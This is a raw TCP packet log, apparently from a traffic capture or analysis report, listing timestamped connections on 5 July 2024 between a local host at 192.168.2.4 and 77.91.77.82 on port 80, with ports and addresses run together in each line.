                                                                Jul 5, 2024 04:24:46.131803036 CEST804985477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:46.835016012 CEST804985477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:46.835155010 CEST4985480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.944402933 CEST4985480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.944406986 CEST4985580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.949352026 CEST804985577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:46.949538946 CEST804985477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:46.949567080 CEST4985580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.949695110 CEST4985480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.949704885 CEST4985580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.954492092 CEST804985577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:47.692666054 CEST804985577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:47.695457935 CEST4985580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:47.698184967 CEST4985680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:47.698185921 CEST4985580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:47.703025103 CEST804985677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:47.703140974 CEST4985680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:47.703306913 CEST4985680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:47.703464985 CEST804985577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:47.703541040 CEST4985580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:47.708076000 CEST804985677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:48.399470091 CEST804985677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:48.399559975 CEST4985680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:48.507446051 CEST4985680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:48.507889986 CEST4985780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:48.512666941 CEST804985777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:48.512726068 CEST4985780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:48.513036966 CEST804985677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:48.513082027 CEST4985680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:48.513119936 CEST4985780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:48.517901897 CEST804985777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:49.231018066 CEST804985777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:49.231129885 CEST4985780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:49.234116077 CEST4985780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:49.234116077 CEST4985880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:49.238872051 CEST804985877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:49.239212990 CEST804985777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:49.239223003 CEST4985880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:49.239273071 CEST4985780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:49.239522934 CEST4985880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:49.244260073 CEST804985877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:49.950884104 CEST804985877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:49.950942039 CEST4985880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.070521116 CEST4985880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.070926905 CEST4985980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.075720072 CEST804985977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:50.075788021 CEST4985980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.076112032 CEST4985980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.079360008 CEST804985877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:50.079402924 CEST4985880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.081064939 CEST804985977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:50.786679983 CEST804985977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:50.789886951 CEST4985980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.789886951 CEST4985980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.791332006 CEST4986080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.795042992 CEST804985977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:50.796098948 CEST804986077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:50.796132088 CEST4985980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.799576044 CEST4986080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.799576044 CEST4986080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:50.804307938 CEST804986077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:51.516417027 CEST804986077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:51.523332119 CEST4986080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:51.635330915 CEST4986180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:51.635332108 CEST4986080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:51.641061068 CEST804986177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:51.641316891 CEST804986077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:51.643450022 CEST4986080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:51.643451929 CEST4986180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:51.647334099 CEST4986180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:51.652175903 CEST804986177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:52.345113993 CEST804986177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:52.345172882 CEST4986180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:52.348797083 CEST4986180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:52.349173069 CEST4986280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:52.354020119 CEST804986277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:52.354109049 CEST804986177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:52.354124069 CEST4986280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:52.354162931 CEST4986180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:52.354271889 CEST4986280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:52.358997107 CEST804986277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:53.058583021 CEST804986277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:53.061501980 CEST4986280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.178817987 CEST4986380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.178822041 CEST4986280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.183651924 CEST804986377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:53.183965921 CEST804986277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:53.184056044 CEST4986380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.184107065 CEST4986280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.184231997 CEST4986380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.189002037 CEST804986377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:53.888694048 CEST804986377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:53.888747931 CEST4986380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.892215967 CEST4986380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.892591953 CEST4986480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.897349119 CEST804986477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:53.897363901 CEST804986377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:53.897409916 CEST4986480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.897428989 CEST4986380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.897550106 CEST4986480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:53.902265072 CEST804986477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:54.596714020 CEST804986477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:54.596771002 CEST4986480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:54.710418940 CEST4986480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:54.710860968 CEST4986580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:54.715534925 CEST804986477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:54.715584993 CEST4986480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:54.715593100 CEST804986577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:54.715689898 CEST4986580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:54.715965033 CEST4986580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:54.720685959 CEST804986577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:55.452366114 CEST804986577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:55.459364891 CEST4986580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:55.471620083 CEST4986580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:55.472871065 CEST4986680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:55.477428913 CEST804986577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:55.477535963 CEST4986580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:55.478173018 CEST804986677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:55.478271961 CEST4986680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:55.478894949 CEST4986680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:55.483596087 CEST804986677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:56.192886114 CEST804986677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:56.192951918 CEST4986680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:56.304326057 CEST4986680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:56.304589987 CEST4986780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:56.309361935 CEST804986777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:56.309410095 CEST804986677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:56.309428930 CEST4986780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:56.309461117 CEST4986680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:56.309575081 CEST4986780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:56.316430092 CEST804986777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:57.012932062 CEST804986777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:57.013127089 CEST4986780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.015626907 CEST4986780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.015944004 CEST4986880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.020579100 CEST804986777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:57.020694971 CEST804986877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:57.020709038 CEST4986780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.020889044 CEST4986880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.021064043 CEST4986880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.025753021 CEST804986877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:57.725033045 CEST804986877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:57.725136042 CEST4986880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.837646961 CEST4986880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.838010073 CEST4986980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.842771053 CEST804986977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:57.842829943 CEST4986980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.843012094 CEST804986877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:57.843060017 CEST4986880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.843175888 CEST4986980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:57.847929955 CEST804986977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:58.555212021 CEST804986977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:58.555273056 CEST4986980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:58.560061932 CEST4986980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:58.560439110 CEST4987080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:58.565104008 CEST804986977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:58.565160036 CEST4986980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:58.565232038 CEST804987077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:58.565289974 CEST4987080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:58.566773891 CEST4987080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:58.571571112 CEST804987077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:59.274348021 CEST804987077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:59.274616003 CEST4987080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:59.383341074 CEST4987080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:59.383364916 CEST4987180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:59.388176918 CEST804987177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:59.388401985 CEST804987077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:59.388439894 CEST4987180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:59.388622046 CEST4987080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:59.388631105 CEST4987180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:59.393778086 CEST804987177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:00.083435059 CEST804987177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:00.083484888 CEST4987180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.087028027 CEST4987180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.087450027 CEST4987280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.092114925 CEST804987177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:00.092238903 CEST4987180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.092271090 CEST804987277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:00.092334032 CEST4987280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.092688084 CEST4987280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.097786903 CEST804987277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:00.790590048 CEST804987277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:00.790642977 CEST4987280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.897067070 CEST4987280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.899346113 CEST4987380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.902122021 CEST804987277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:00.902214050 CEST4987280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.904160023 CEST804987377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:00.907433987 CEST4987380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.910526037 CEST4987380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:00.915277004 CEST804987377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:01.598658085 CEST804987377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:01.599421978 CEST4987380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:01.602252007 CEST4987380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:01.602252007 CEST4987480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:01.607243061 CEST804987477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:01.607347965 CEST4987480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:01.607484102 CEST804987377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:01.607511044 CEST4987480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:01.611430883 CEST4987380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:01.612458944 CEST804987477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:02.300925970 CEST804987477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:02.300990105 CEST4987480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:02.414586067 CEST4987480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:02.414926052 CEST4987580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:02.419735909 CEST804987577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:02.419791937 CEST4987580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:02.419961929 CEST804987477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:02.420011997 CEST4987480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:02.420214891 CEST4987580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:02.425059080 CEST804987577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:03.125586987 CEST804987577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:03.129507065 CEST4987580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.132025003 CEST4987580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.132302999 CEST4987680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.137072086 CEST804987677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:03.137145996 CEST4987680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.137315035 CEST804987577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:03.137435913 CEST4987580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.137552977 CEST4987680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.142339945 CEST804987677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:03.842461109 CEST804987677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:03.842508078 CEST4987680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.961028099 CEST4987680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.961405993 CEST4987780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.966120958 CEST804987677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:03.966165066 CEST4987680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.966229916 CEST804987777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:03.966289997 CEST4987780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.966561079 CEST4987780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:03.971299887 CEST804987777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:04.677542925 CEST804987777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:04.677592039 CEST4987780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:04.680689096 CEST4987780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:04.681041956 CEST4987880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:04.685935974 CEST804987777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:04.685947895 CEST804987877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:04.686026096 CEST4987780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:04.686058998 CEST4987880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:04.686247110 CEST4987880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:04.691112041 CEST804987877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:05.396435976 CEST804987877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:05.396598101 CEST4987880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:05.506721020 CEST4987880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:05.507004976 CEST4987980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:05.511858940 CEST804987977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:05.512300014 CEST804987877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:05.512398005 CEST4987980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:05.512398958 CEST4987880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:05.513591051 CEST4987980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:05.518496990 CEST804987977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:06.223711014 CEST804987977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:06.223767996 CEST4987980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:06.226979017 CEST4987980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:06.227355003 CEST4988080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:06.232132912 CEST804988077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:06.232142925 CEST804987977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:06.232193947 CEST4988080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:06.232212067 CEST4987980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:06.232382059 CEST4988080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:06.237135887 CEST804988077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:06.956571102 CEST804988077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:06.963345051 CEST4988080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.068927050 CEST4988080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.068929911 CEST4988180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.073839903 CEST804988177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:07.074073076 CEST804988077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:07.075460911 CEST4988080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.075463057 CEST4988180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.075541019 CEST4988180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.080255032 CEST804988177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:07.763421059 CEST804988177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:07.769717932 CEST4988180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.769717932 CEST4988180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.771344900 CEST4988280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.775121927 CEST804988177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:07.776153088 CEST804988277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:07.776182890 CEST4988180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.779616117 CEST4988280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.779616117 CEST4988280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:07.784356117 CEST804988277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:08.501566887 CEST804988277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:08.501624107 CEST4988280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:08.616703987 CEST4988280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:08.617132902 CEST4988380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:08.622102976 CEST804988377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:08.622168064 CEST4988380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:08.622385979 CEST4988380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:08.622474909 CEST804988277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:08.622522116 CEST4988280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:08.627074003 CEST804988377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:09.334642887 CEST804988377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:09.335376978 CEST4988380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:09.337934017 CEST4988380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:09.338310957 CEST4988480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:09.343789101 CEST804988377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:09.343835115 CEST804988477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:09.343897104 CEST4988380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:09.343954086 CEST4988480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:09.344191074 CEST4988480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:09.349142075 CEST804988477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:10.150197029 CEST804988477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:10.150255919 CEST4988480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.257186890 CEST4988480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.257530928 CEST4988580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.262352943 CEST804988577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:10.262403965 CEST804988477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:10.262408018 CEST4988580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.262451887 CEST4988480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.262713909 CEST4988580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.267539024 CEST804988577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:10.953598976 CEST804988577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:10.958203077 CEST4988580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.958204031 CEST4988580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.959348917 CEST4988680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.963432074 CEST804988577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:10.964106083 CEST804988677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:10.967480898 CEST4988580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.967480898 CEST4988680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.971347094 CEST4988680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:10.976125002 CEST804988677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:11.671976089 CEST804988677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:11.679352999 CEST4988680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:11.791351080 CEST4988680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:11.791353941 CEST4988780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:11.796199083 CEST804988777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:11.796458006 CEST804988677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:11.799489021 CEST4988680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:11.799490929 CEST4988780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:11.803349018 CEST4988780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:11.808190107 CEST804988777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:12.500478029 CEST804988777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:12.500533104 CEST4988780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:12.503729105 CEST4988780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:12.504187107 CEST4988880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:12.508927107 CEST804988877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:12.508936882 CEST804988777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:12.508989096 CEST4988780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:12.509052992 CEST4988880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:12.509263992 CEST4988880192.168.2.477.91.77.82
